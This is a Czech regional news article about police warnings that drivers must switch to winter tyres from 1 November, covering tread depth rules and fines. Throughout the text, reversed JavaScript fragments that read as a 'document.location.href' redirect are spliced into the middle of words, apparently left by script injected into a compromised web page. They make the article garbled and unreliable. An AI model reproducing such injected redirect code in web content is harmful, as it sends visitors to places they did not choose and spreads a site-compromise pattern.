Rainbow page separator

Řidiči přezouvají pneumatiky, policisté chystají kontroly

Pondělí, 1. listopadu 2021

Žďársko / Na nutnost přezout se začátkem lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu na zimní gumy, pokud se na silnici nachází souvislá vrstva sněhu, ledu či námraza, případně je lze očekávat, upozorňují vysočinští policisté. A také na skutečnost, že pokud řidiči [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nebudou respek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat, hrozí jim pokuta až dva tisíce korun v příkazním řízení, anebo i zákaz jízdy na nevhodných pneumatikách ohrožujících bezpečnost a plynulost silničního provozu. V případě, že dojde k dopravní nehodě, ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to skutečnost se při vyšetřování zohledňuje a rovněž předává dál České kanceláři pojistitelů.
„Každý řidič má odpovědnost nejen vůči sobě, ale také k ostatním účastníkům silničního provozu, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to za nepříznivých podmínek by měl v zimních měsících vyjíždět s vozidlem pouze na zimních pneumatikách,“ vyjádřil se vedoucí krajského odboru služby dopravní policie David Jirák.
U aut s hmotností do 3,5 tuny činí odpovídající hloubka dezénu nejméně čtyři milimetry. Těžké au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily pak musí mít pneumatiky s hloubkou dezénu nejméně šest milimetrů, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na všech kolech hnacích náprav s trvalým přenosem hnací síly. Policisté se při kontrolách zaměří především na úseky silnic, kde řidiči na letních pneumatikách v předchozích letech čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to havarovali, případně tam v zimních měsících zcela zablokovali provoz.
V platnosti i nadále zůstává dopravní značka Zimní výbava – kdy jsou šoféři v období od 1. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu do 31. března při jízdě povinni použít výhradně vozidlo vybavené zimními pneumatikami.